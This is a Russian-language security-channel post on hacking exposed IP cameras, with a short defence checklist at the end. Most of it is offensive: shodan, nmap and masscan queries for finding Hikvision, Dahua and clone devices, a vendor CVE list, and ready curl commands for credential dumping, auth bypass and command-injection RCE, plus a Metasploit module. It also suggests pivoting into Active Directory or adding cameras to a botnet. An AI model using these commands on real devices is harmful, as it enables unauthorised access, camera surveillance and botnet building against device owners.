IP-камеры 📷 - никсы с RTSP и веб-сервером. Миллионы устройств Hikvision, Dahua, Axis и их OEM-клонов торчат в интернет с прошивками 2017–2021 годов. И злоумышленники этим активно пользуются. Мой любимый реальный кейс - это когда у APT была наводка, что пароли пишут на маркерной доске, но её закрывал открытый шкаф, который несколько месяцев не закрывали, и вот APT ждали пару месяцев, пока шкаф закроют. Дождались. Взломали инфру.
Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону
РАЗВЕДКА 🎣
Начнём с малого, все их знают, все ими пользуются, как говориться, вот они слева направо - shodan, nmap и masscan, выбирайте тот, который вам больше по душе:
shodan search "App-webs" "Hikvision" country:US
shodan search "Dahua" port:37777
shodan search "Server: Netwave IP Camera"
nmap -sV -p 80,443,554,8000,8080,37777,34567 10.0.0.0/24
nmap --script http-vuln* -p 80,8080 192.168.1.100
masscan 203.0.113.0/24 -p80,554,8000,37777 --rate 2000
Для инфо, порт 37777 - относится к Dahua, а 34567 - к ISAPI
УЯЗВИМОСТИ ПО ВЕНДОРАМ 🪙
Когда найдёте камеры - смотрите на вендоров, самые вкусны уязы по ним я заботливо указал ниже.
Hikvision (DS-2CD2xx, DS-2DE4xx, DS-76xxNI NVR):
- CVE-2017-7921 — обход auth, утечка /Security/users и config с хэшами паролей
- CVE-2021-36260 — RCE через command injection в device.rsp и метод PUT
- CVE-2023-28815 — stack overflow в старых версиях NVR DS-7600/7700/9600
Dahua (IPC-HFW, IPC-HDW, XVR5108/5116):
- CVE-2021-33044 / CVE-2021-33045 — auth bypass через NetUser/LogicDevice
- CVE-2022-3056 — hardcoded credentials в прошивках до 2022.08
Axis (M3045-V, P3225, Q1615):
- CVE-2018-10661 — auth bypass в libcurl-компоненте
- CVE-2023-21482 — path traversal в ACAP-приложениях
OEM и клоны (TBK, Novo, CeNova, QSee):
- CVE-2018-9995 — bypass через Cookie: uid=admin на /device.rsp
ThroughTek Kalay P2P (Reolink, Wyze OEM, десятки брендов):
- CVE-2021-28372 — перехват UID, доступ к RTSP без auth
ЭКСПЛУАТАЦИЯ 🔓
Самые простые уязы я расписал ниже, для понимания того, насколько легко атаковать старые камеры
CVE-2017-7921 — Hikvision, dump credentials:
curl -s "http://192.168.1.100/Security/users?auth=YWRtaW46MTEK"
curl -s "http://192.168.1.100/System/configurationFile?auth=YWRtaW46MTEK" -o config.bak
CVE-2021-36260 — Hikvision RCE:
curl -X PUT "http://192.168.1.100/SDK/webLanguage" \
-d '<?xml version="1.0"?><language>$(id>/tmp/pwned)</language>'
curl -s "http://192.168.1.100/pwned"
или
use exploit/linux/http/hikvision_unauth_rce_cve_2021_36260
CVE-2021-33044 — Dahua auth bypass:
curl -X POST "http://192.168.1.101:80/RPC2_Login" \
-H "Content-Type: application/json" \
-d '{"method":"global.login","params":{"userName":"admin","password":"","clientType":"NetKeyboard"},"id":10000}'
CVE-2018-9995 — TBK/DVR clones:
curl -s "http://192.168.1.102/device.rsp?opt=user&cmd=list" \
-H "Cookie: uid=admin"
ПОСТЭКСПЛУАТАЦИЯ 🗡
То, что мы получили шэл на камере - это конечно круто, но что дальше? Как говорится, следите за руками: pivot в VLAN через ONVIF -> NVR -> Active Directory, ну или просто в свой ботнет добавить 📀. ONVIF (порт 80/8080, UDP 3702 для WS-Discovery) - стандарт управления IP-камерами. Через него NVR может делать следующее:
- находить камеры в сети
- получать RTSP-URL и учётки
- менять конфигурацию
- иногда хранит централизованные credentials
ЗАЩИТА 🛡
Хакеров задобрили, пора уделить время и защитникам, вот пара рекомендация для вас:
1. Камеры держите в отдельном изолированном VLAN,
2. На СЗИ запретите исходящий интернет-трафик к сети с камерами
3. Регулярно обновляйте ПО на камерах
4. Отключите P2P/UPnP/Cloud если не нужны
5. Установите MFA на NVR и смена дефолтные пароли
Подписывайтесь на канал, ставьте класы 👍